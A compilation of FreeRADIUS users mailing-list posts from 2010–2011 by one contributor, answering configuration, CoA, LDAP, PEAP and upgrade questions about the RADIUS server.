Hi, Seeing as the list is quiet, something that might be of interest. I am running 2.1.12 on a production server. The server is (was) severly underpowered and the database was straining. I was expenting the normal - rejecting duplicate request. (Cant remember exact error). Then the server received about 30 access requests in about .1 second It then went into a state where the following appeared over and over in the log: Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 647 in component core module queue. Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 648 in component core module queue. Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 649 in component core module queue. Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 650 in component core module queue. Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 651 in component core module queue. Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 652 in component core module queue. Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 690 in component core module queue. Mon Sep 12 11:33:46 2011 : Info: WARNING: Child is hung for request 685 in component core module queue. Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 691 in component core module queue. Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 692 in component core module queue. Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 693 in component core module queue. Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 694 in component core module queue. Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 677 in component core module queue. Mon Sep 12 11:33:47 2011 : Info: WARNING: Child is hung for request 686 in component core module queue. Mon Sep 12 11:33:48 2011 : Info: WARNING: Child is hung for request 625 in component core module queue. Mon Sep 12 11:33:48 2011 : Info: WARNING: Child is hung for request 626 in component core module queue. Mon Sep 12 11:33:48 2011 : Info: WARNING: Child is hung for request 627 in component core module queue. Mon Sep 12 11:33:48 2011 : Info: WARNING: Child is hung for request 628 in component core module queue. It never recovered. Had to be restarted. Even with no database queries outstanding. Dont know if 2.1.12 has more difficulty with slow databases? Unfortunately dont have more info, so this can probably be ignored. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: CoA proxying again
On 2011/09/06 06:50 PM, Alan DeKok wrote: I believe I saw a request for dynamic home servers recently. Looks like that might be something for me as well. Maybe. Or, having less work to say this client can also receive CoA requests. This would essentially automatically add a coa home server for the client?? That might be easy to add for 3.0. +1 This would also be a GREAT feature for me. How far is 3.0 off? 2.12 (or 2.13) maybe? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Need help authenticating local users on Apple server
On 2011/08/16 10:39 PM, Raymond Norton wrote: And then list it in the authorize section. What is the proper syntax for adding the opendirectory module? I am getting errors when attempting to start radius: /usr/local/etc/raddb/sites-enabled/inner-tunnel[195]: Entry is not a reference to a module /usr/local/etc/raddb/sites-enabled/inner-tunnel[189]: Errors parsing authenticate section. Read again. list it in the authorize section not the authenticate section -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How to setup Freeradius in a Domain
On 2011/07/13 06:51 PM, Phil Mayers wrote: If you are using Samba as your domain controllers, then you have access to the SAM and can extract the LM/NT hash from whatever backend you use. So you can just feed that info straight to FreeRADIUS. No need to use ntlm_auth / samba membership - just dump the NT hashes somewhere FreeRADIUS can get at them, or if you're using LDAP, point FreeRADIUS at that LDAP server and make sure it can read the ntPassword attribute. This is preferable to using ntlm_auth in fact. OK... So the ntlm_auth hack is just because a Microsoft Domain Controller/LDAP refuses to share the ntPassword attribute with anyone that does not look like Microsoft? Hopefully Samba4 changes that as it should have a copy of the AD database! Thanks! -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: General wiki rules
On 2011/07/14 07:09 PM, Arran Cudbard-Bell wrote: Ok heres the deal. There are three formats we use on the wiki: 1. markdown 2. restructuredtext 3. mediawiki I spent about 1/2 hour a while ago trying to get a basic guide to either markdown or restructuredtext. Google was unhelpful, are there any good tutorials? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How to setup Freeradius in a Domain
On 2011/07/13 05:49 PM, Phil Mayers wrote: To login with domain credentials, FreeRADIUS must be able to check domain credentials. To check domain credentials, FreeRADIUS must be able to talk to Samba as a domain member. - Just for interest sake... We use a lot of Samba Domain Controllers (samba3, NT4 style domain) Can you get this to work if you dont want Windows on your network? (Not something I'm trying to achieve, just curious) -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: FreeRadius Support for WiMAX Sub-TLVs of Sub-TLVs
On 2011/06/03 10:07 AM, Alan DeKok wrote: Martin wrote: Did this and it is 3.0.0, but on on the official site there is nothing mention regarding 3.0 version. When is going to be official released 3.0? Perhaps this summer. What hemisphere are you in? :-) -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Error: User-Name is not the same as MS-CHAP name
On 2011/06/03 02:15 PM, Phil Mayers wrote: I'm not downloading a torrent of copyrighted software to fix someone else's problem. As long as you dont get a key, it is legal. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Wiki - once upon a time there was documentation
On 2011/06/01 12:17 PM, Phil Mayers wrote: ...in which the migration technique was discussed, and help was requested to reformat documents which had not migrated seamlessly. - Is the old wiki accessable anywhere so one can help to manually transfer info? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: New FreeRADIUS wiki - Help appreciated!
On 2011/05/27 03:22 AM, Arran Cudbard-Bell wrote: http://power.freeradius.org:4567 is problematic from here (slow, and Some ISP's prioritize 4567 different to 80. Is their any good reason it runs on 4567? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Can FreeRadius connect to ACT! database?
On 2011/04/06 12:52 AM, Gary Gatten wrote: Option 4.) Dump data from ACT to a real DB, then dump ACT completely? j/k - sorta... Does ACT support triggers and / or stored procedures? If so it would be relatively easy to keep a subset of the ACT DB in MySQL (or whatever) and keep it synchronized. If ACT is ODBC, I'm sure one could install an ODBC driver and write a query in SQL ( or whatever ACT uses). At that point it wouldn't be any different than any other backend data store. There is probably an option 5 - 10 as well. Is this a high volume environment? How many requests per sec / minute are we guestimating? I ask because if it's low you have many more options than if it's high. Hi all, ACT is actually a CRM system. Unsure what database it uses, but I suspect it is Access Based (that horrible M$ thing) My suggestion would be to use a php script (called using rlm_exec) that can query the ACT database directly. Php can query weird and wonderful databases using odbc, and rlm_exec can call any php script. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 --- Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html --- - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: testing which client initiated request ? Client-shortname ... FreeRADIUS-Client-Shortname
On 2011/03/29 09:28 PM, Robert Roll wrote: The Use Packet-Src-IP-Address does appear to work.. However, I would really like to have a set of clients behave the same way. I would really like to do something like: client 1.2.3.4 { secret XX shortname mgmtStation Identical-client 1.2.3.5, 1.2.3.6, 1.2.3,7 } Then later on simply test on shortname mgmtStation ? If there is nothing like Identical-client... I did notice while debugging that doing something like: client 1.2.3.4 { secret XX shortname stMgt } client 1.2.3.5 { secret XX shortname stMgt } Assigning two different IP number clients the same shortname ? I noticed that when I looked at some logs, the shortname was used in the log text for BOTH clients.. This could be exploited for what I want, if only the testing client based on shortname worked ? You could try dynamic clients and different virtual servers. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 --- Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/emaildisclaimer.html --- - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: FR 2.1.7 Exits for no reason
On 2011/03/09 01:05 AM, Gary Gatten wrote: We have four FR 2.1.7 servers running on RHEL 5 (fully patched). Every now and then, for no apparent reason, radiusd just stops. It exits with Exiting normally. to syslog. They don't all exit at the same time. Since there are Hi, I had the same issue. (I _think_ it was 2.1.7) Alan's advice was upgrade, there was some stuff fixed. I upgraded to 2.1.9 (which was the current release at the time). It worked. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: AW: AW: AW: AW: Authenticating SSH login on a Cisco IOS switch to AD
On 2011/02/14 01:50 PM, Schaatsbergen, Chris wrote: That is clear, but it seems it is missing in the Lenny Package somehow as http://lists.freeradius.org/pipermail/freeradius-users/2011-January/msg00192.html has exactly the same problem as me, no modules folder being read causing the ntlm_auth not being recognized as module. Where can I find a proper radiusd.conf? Or where in the radiusd.conf should it be? Looking at config below... /usr/local/etc/raddb/modules/ Lenny package does NOT put stuff in /usr/local/ Seems you have two versions of freeradius on your system. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: FR 2.1.0 (ubuntu) proxying to NPS/IAS.
On 2011/02/02 12:32 AM, hellbird wrote: Thank you for your answer. I have contacted Microsoft to help me. Would be really interesting to know if it works contacting them!! -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: FR 2.1.0 (ubuntu) proxying to NPS/IAS.
On 2011/02/02 12:32 AM, hellbird wrote: Thank you for your answer. I have contacted Microsoft to help me. Would be really interesting to know if it works contacting them!! -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Freeradius SQL: PEAP: Tunneled authentication was rejected.
Hi, Does anyone know what nabble.com is and why the mail looks like this? Clicking the link below the email does show a properly formatted response... On 2011/01/28 12:21 PM, chris wrote: Hi Alan, thx for the response, and yes i read the debug output and i also found the side you mentioned, to get more information about the output but, as you see in the number of my posting counts, i'm an newbie in using radius. And i didn't understood what these messages should occur in my mind or how it can be fixed... rlm_eap: processing type mschapv2 +- entering group MS-CHAP rlm_mschap: No Cleartext-Password configured. Cannot create LM-Password. rlm_mschap: No Cleartext-Password configured. Cannot create NT-Password. rlm_mschap: Told to do MS-CHAPv2 for sqluser with NT-Password rlm_mschap: FAILED: No NT/LM-Password. Cannot perform authentication. rlm_mschap: FAILED: MS-CHAP2-Response is incorrect ++[mschap] returns reject rlm_eap: Freeing handler ++[eap] returns reject auth: Failed to validate the user. Login incorrect: [sqluser/] (from client dlink-private-network port 0 via TLS tunnel) } # server inner-tunnel PEAP: Got tunneled reply RADIUS code 3 MS-CHAP-Error = \010E=691 R=1 EAP-Message = 0x04080004 Message-Authenticator = 0x PEAP: Processing from tunneled session code 0x81bd288 3 MS-CHAP-Error = \010E=691 R=1 EAP-Message = 0x04080004 Message-Authenticator = 0x PEAP: Tunneled authentication was rejected. You give me a hint: thx: You probably need to list sql in the inner-tunnel virtual server. In 2.1.10, you can test the inner-tunnel directly, without using PEAP. See the comments at the top of the file. I will try and give an answer thx Chris View this message in context: Re: Freeradius SQL: PEAP: Tunneled authentication was rejected. http://freeradius.1045715.n5.nabble.com/Freeradius-SQL-PEAP-Tunneled-authentication-was-rejected-tp3360430p3361206.html Sent from the FreeRadius - User mailing list archive http://freeradius.1045715.n5.nabble.com/FreeRadius-User-f2740693.html at Nabble.com. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: SSH with Radius on one Server: no password match by authentication over sshd --- password match over NTRadPING
On 2011/01/24 02:00 AM, Marius.Meisner wrote: /etc/pam_radius_auth.conf:* # server[:port] shared_secret timeout (s) _127.0.0.1 secret 2_ ^ This does not match.. */etc/freeradius/clients.conf:* ... _client 110.110.110.0/24 { ^ this And therefore the shared secret is incorrect. Either fix pam to talk to the 110.110.110 address or fix Freeradius to have the correct shared secret under the 127.0.0.1 client Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Call for 2.1.11
On 2011/01/18 03:58 PM, Alan DeKok wrote: Anything else for 2.1.11? It's been 5 months since 2.1.10. I think the updfromto fixes should go in, if I can figure out how to make it work on Linux *and* other systems. Hi, I still think this might make alot of questions go away. http://lists.freeradius.org/pipermail/freeradius-users/2009-September/msg00357.html Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Help needed with user authentication
On 2011/01/19 04:24 AM, Luke Hammond wrote: Hey, i am new so sorry that i know nothing about Freeradius. Basically, i found a tutorial and followed it to get Freeradius2, Mysql and Daloradius working together.. that part is ok. But i am confused with this: I want to have a wireless network, that will be open, and when a user connects and tries to browse they get redirected to a page where they have to login, and that will talk to freeradius to make sure the user is authorised, then it will accept them and continue to where they were trying to browse to.. Thats basically what i need, but how does Freeradius do that? Where is that page so i can edit it with my logo or whatever? Or do i need more software to have that login page? Please assist, am desperate here to get this working.. thanks in advance! Try coova.org/CoovaChilli -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: modules directory
On 2011/01/17 10:37 PM, Christ Schlacta wrote: one more question: can there be multiples of ANY module specified? for example, can I use two different ldap or sql modules if I were to need to (just as a bad example, I propose: 1 radius server, 2 wlans with different user bases that can't be merged into one directory for whatever reasons). The first instance of a module is defined (and called) using the module name e.g. Definition: checkval { item = } Calling the module: checkval The seconds instance is named and called using the name Definition: checkval blah { item = ... } Calling the module: blah Hope that helps. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Deleting stale session automatically with unlang
On 2011/01/14 12:50 PM, Bishal Pun wrote: Alan, While running that command in mysql it clear the session of user. But with radius unlang it is giving error in radius log. I might be wrong, but as far as I know rlm_mysql expects something to come back from the query. Can't think of a solution though unless rlm_mysql will allow somehting like %{sql: SELECT 1; UPDATE radacct set AcctStopTime=ADDDATE(AcctStartTime,INTERVAL AcctSessionTime SECOND), AcctTerminateCause='Clear-Stale Session' WHERE UserName='%{User-Name}' and CallingStationId='%{Calling-Station-Id}' and AcctStopTime is null} -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Freeradius on lenny doesn't permit mschap auth
On 2011/01/14 02:07 PM, Alan DeKok wrote: I attach my debug output You're running 2.0.4. I suggest upgrading to 2.1.10. I'm on Debian/lenny, I will stay on lenny. That's your choice. But... not our recommendation. I run debian lenny and 2.1.10. Download the source. Extract. run dpkg-buildpackage You have a debian package for 2.1.10 that you can install. Its that simple. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Freeradius on lenny doesn't permit mschap auth
On 2011/01/14 03:57 PM, Josip Rodin wrote: Actually it's even simpler. Add lenny-backports to sources.list, update, and just install the new packages. Must say I didn't know that backports also maintained freeradius. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: segfault with rlm_perl
On 2011/01/04 09:59 PM, Anatoly Ivanov wrote: Hi, I am running freeradius (2.1.8) with rlm_perl (5.10.1, USE_ITHREADS) on a Debian-Lenny system. The problem is radius fails with segfault – periodically and intermittently. I have no way to reliably reproduce the problem – it happens only in production, and it is impossible to reliably predict when or backtrace why. It seems that I am running into some kind of memory allocation error. Coredump type #3 (see below) is the most popular one; coredumps with backtrace going into perl seem to be rather random (it fails in different parts of libperl.so) - again, see below. I understand that freeradius has a newer version available - but I am hesitant to upgrade a production server without a very good reason. And I could not find such reason for an upgrade after reading the CHANGELOG for 2.1.10. But maybe I am wrong? Any ideas? A complete gut feel after reading this says you have a hardware problem - faulty ram. Has this happened from the beginning or suddenly now? You can try memtesting (http://www.memtest.org/) the server, or a trick that I've found works sometimes (if you can't take the server out of production) to show a ram problem, is to compile a kernel. I've seen compilation fail at different stages with faulty RAM. I realiuse the advice might sound ridiculous, but it has worked for me before. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Voip database
On 2010/12/21 10:01 AM, miha- wrote: Thank you @Johan Meiring for that. It is not my intend to spam the group and asking same question again and again. Belive me that I have done everything that you said (I changed secret on the NAS and ond the radius and I restarted both,...). So please help me out with this problem. I can see that the secret is wrong. But why? First request goes through: +- entering group PAP {...} [pap] login attempt with password 1122 [pap] Using clear text password 1122 [pap] User authenticated successfully But the second what is rejected due to wrong secret. User-Name = 081609000 User-Password = \257+\360\350 [pap] login attempt with password ¯+ðè [pap] Using clear text password 1122 [pap] Passwords don't match SO this I am asking. If the first time secret is right and for the second request is wrong. Could the different encryption (the is sending nas) is causing the problem? Answer the following: 1) What is the NAS's IP? 2) Post the section in clients.conf defining the NAS 3) Post the NAS config. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Voip database
On 2010/12/21 10:26 AM, miha- wrote: ##- Activate RADIUS connection setProperty com.centile.connectors.aaa.watchdog.enable false setProperty com.centile.connectors.aaa radius setProperty com.centile.connectors.aaa.localserv intraswitch setProperty com.centile.connectors.aaa.localpass 1122 setProperty com.centile.connectors.aaa.remotserv 1.2.3.5 (ip of freeradius) setProperty com.centile.connectors.aaa.remotport 1812 setProperty com.centile.connectors.aaa.calltype any I nothing of centile. Alan is right that you need to ask them.. But, my logic says that you need a line similar to the following on your centile NAS. setProperty com.centile.connectors.aaa.remotepass 1122 ^^ -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Voip database
On 2010/12/17 11:41 AM, miha- wrote: Hello, this is user-name and password for phone that is registered on NAS. NAS is sending authentication to freeradius server. Please do NOT confuse the shared secret and the password that the phone uses. The shares secret is a secret between the NAS and Freeradius. The Phones password (in access-request) is encrypted using the shared secret. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Do get in some other file?
On 2010/12/14 11:08 AM, Marinko Tarlac wrote: Hi.. It seems that you all have the same teacher... last 15 days this list was in some kind of spam attack... Almost the same questions every day... Hi I am and I have FR 2.1.10 on Ubuntu. How to add MAC to file? I think the answer is here: http://www.catb.org/~esr/faqs/smart-questions.html Especially here: http://www.catb.org/~esr/faqs/smart-questions.html#homework Maybe someone should tell us who the teacher is so we can ask him to add some mailing list etiquette to his course? Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Plz advice on a good captive portal for FreeRadius
On 2010/12/11 06:07 AM, Jayakrishnan wrote: Please advice me how to create a Captive portal with in the FreeRadius AAA server. Is it possible to use NoCatSplash and use FreeRadius Authentication and Authorization? Use CoovaChilli (Previously called chillispot) -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Freeradius COA trigger
On 2010/12/13 05:23 AM, Andrew Paternoster wrote: Hi Johan Do you mind sharing a copy of your COA triggers? In Perl (rlm_perl) - Where I make my decision to disconnect. --- if ($balance = 0) { $RAD_REPLY{'Tmp-String-0'} = 'DISCONNECT'; }; In my virtual server accounting { perl if (%{reply:Tmp-String-0} == DISCONNECT) { update disconnect { User-Name = %{User-Name} } } } -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: configure radius to write detailed log to multiple files
On 2010/12/01 09:05 PM, kabilius smith wrote: Hi Alan, I tried adding another detail module like the following: detail { detailfile = c:/testfolder/testfile.log detailperm = 0777 } detail { detailfile = c:/testfolder/testfile1.log detailperm = 0777 } Do the following: detail mydetail1 { detailfile = c:/testfolder/testfile.log detailperm = 0777 } detail mydetail2 { detailfile = c:/testfolder/testfile1.log detailperm = 0777 } Then in authorisation/accounting instead of listing detail list mydetail1 and mydetail2 i.e. When configuring more than one of the same module type, name them and refer to them by name. Hope that makes sense. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: dynamically selecting, which attribute to evaluate
On 2010/12/01 07:46 PM, Alan DeKok wrote: For the meantime, would it be feasable to update control { temp_attribute := reply:%{control:TicketType}-trigger-reactivation } and later if (%{control:temp_attribute} != ){ do the rest } sigh I said: You can't really do two levels of expansion like that, sorry. Using rlm_perl, you should be able to get the functionality you want. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: FreeRADIUS 2.1.10 regression in logging behaviour
On 2010/11/27 01:32 PM, Alan DeKok wrote: Another fix would be to add a radmin command to re-open just the log files. Squid does something similar. squid -l logrotate reopens the log files. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Problem with FreeRADIUS + PPPoE + Mikrotik
On 2010/11/24 06:05 AM, Pableus wrote: I have not got the exact number right now. We're still doing tests, so for now a few clients authenticate with RADIUS, the rest follows as usual. What catches my attention is that users only have problems when they are passed to the RADIUS, otherwise do not have problems with disconnections. What you are saying My red car wont drive, but my green car does. What is wrong with my red car? We have NO IDEA. You will have to troubleshoot yourself and come up with better info. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: configure output summary
On 2010/11/19 08:55 AM, Stefan Winter wrote: away. Much better than running a whacky script, of course! I feel that adding the script cannot do any harm whatsoever. I agree that a lot of newbies will not read it, but if _one_ person reads it a month, it will mean less questions on the list! Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Doubt - Freeradius + Ldap
On 2010/11/04 01:51 PM, eduardo moreira wrote: and i use this command to test connection: radtest username 123456 10.12.60.19 1812 0 password man radtest gives me this: radtest [-d raddb_directory] user password radius-server nas-port-number secret [ppphint] [nasname] Looking at your command: radtest username 123456 10.12.60.19 1812 0 password This maps to: user=username password=123456 radius-server=10.12.60.19 nas-port-number=1812 secret=0 ppphint=password -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Doubt - Freeradius + Ldap
On 2010/11/04 02:16 PM, eduardo moreira wrote: raddtest -d /etc/freeradius username password ip-server port-server secret but no works. Copy and paste your command. Do not retype it. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Doubt - Freeradius + Ldap
On 2010/11/04 02:37 PM, eduardo moreira wrote: sorry radtest -d /etc/freeradius username 123456 10.12.60.19 1812 password any That should work. The any is probably unnecesary. What does freeradius -X now say? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: FAQ and Wiki down?
On 2010/10/29 04:43 PM, Mark Holmes wrote: Works for me also IE sometimes doesn't work if the website does not start with www. You then need to explicitly specify http:// Try adding http:// in front of wiki.freeradius.org -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Freeradius COA trigger
Hi, I have a freeradius setup generating COA successfully (when neccesary) after receiving accounting packets. This works well. Now I want to also make Freeradius generate a COA by some other means. e.g. a tech support guy clicking disconnect on a web page. I.e. I want to somehow trigger a coa that is not caused by an update coa {} block, but by some external trigger. Is this possible in any way? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Problem with Alcatel 4604 and Cisco ACS
On 2010/10/07 10:01 AM, matteo wrote: Hello, I'm in trouble trying to authenticate a client connecting to an Alcatel 4604 (Aruba device) to a Cisco ACS, because my alcatel send as Called-Station-Id value its mac-address. On the Cisco side, this value correspond to the SSID value, while this attribute on Alcatel is send via Aruba-Essid-Name (attribute 5 in dictionary.aruba). Is there a way to change this behavior or a remap of this attribute for Alcatel? Where is Freeradius involved? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Radius+Ldap:Allow the same host in multiple vlans
On 2010/09/30 05:05 PM, Ramon Escriba wrote: Hi Alan, Then does it possible to do a general match rule in huntgroups to lets say the 35 first ports belong to a vlan A and the rest 36 to 48 to vlan B,or not? It sounds like you need some custom logic. Have you looked at rlm_perl? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Radius not recording - The maximum number of threads (300) are active, cannot spawn new thread to handle request
On 2010/09/29 06:58 PM, Marie Tambe wrote: If anybody is using mysql for Radius. Could you tell me columns that you have created index for? Your question is invalid. Go buy a sql book. PS: It's already been suggested that this is the Freeradius list, not the mysql list. PPS: Buy a book has also been suggested. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Last call for 2.1.10
On 2010/09/22 03:15 PM, Alan DeKok wrote: I've put some preliminary tar files on: http://git.freeradius.org/pre/ If there are any issues, let me know now. Otherwise we'll release 2.1.10 on Monday. Would be nice to remove +git from debian/changelog -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Originate COA home_server
Hi, I've configured originate COA using the originate-coa as an example. My (relevant/edited for privacy) configuration looks like this: client 11.22.33.44 { secret = verysecret shortname = test nastype = other virtual_server = my_virtual_server coa_server = my-coa } home_server my-coa { type = coa ipaddr = 11.22.33.44 port = 3799 secret = blah coa { irt = 2 mrt = 16 mrc = 5 mrd = 30 } } home_server_pool blah { type = fail-over home_server = my-coa } - This works perfectly. The home_server_pool seems unnecesary though, but if I leave it out, freeradius -X complains that the home_server does not exist. - /etc/freeradius/sites-enabled/my-config[1]: No such home_server or home_server_pool my-coa - It almost seems that the home_server_pool is neccesary to instantiate the home_server. Reading proxy.conf and the originate-coa example, it seems that a home_server_pool is only neccesary if you want to actually fail-over/round-robin, etc I'm sure I can leave the config as is, as the home_server_pool is never actually referenced. Am I completely confused? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: AW: convert mac adresses to lower case
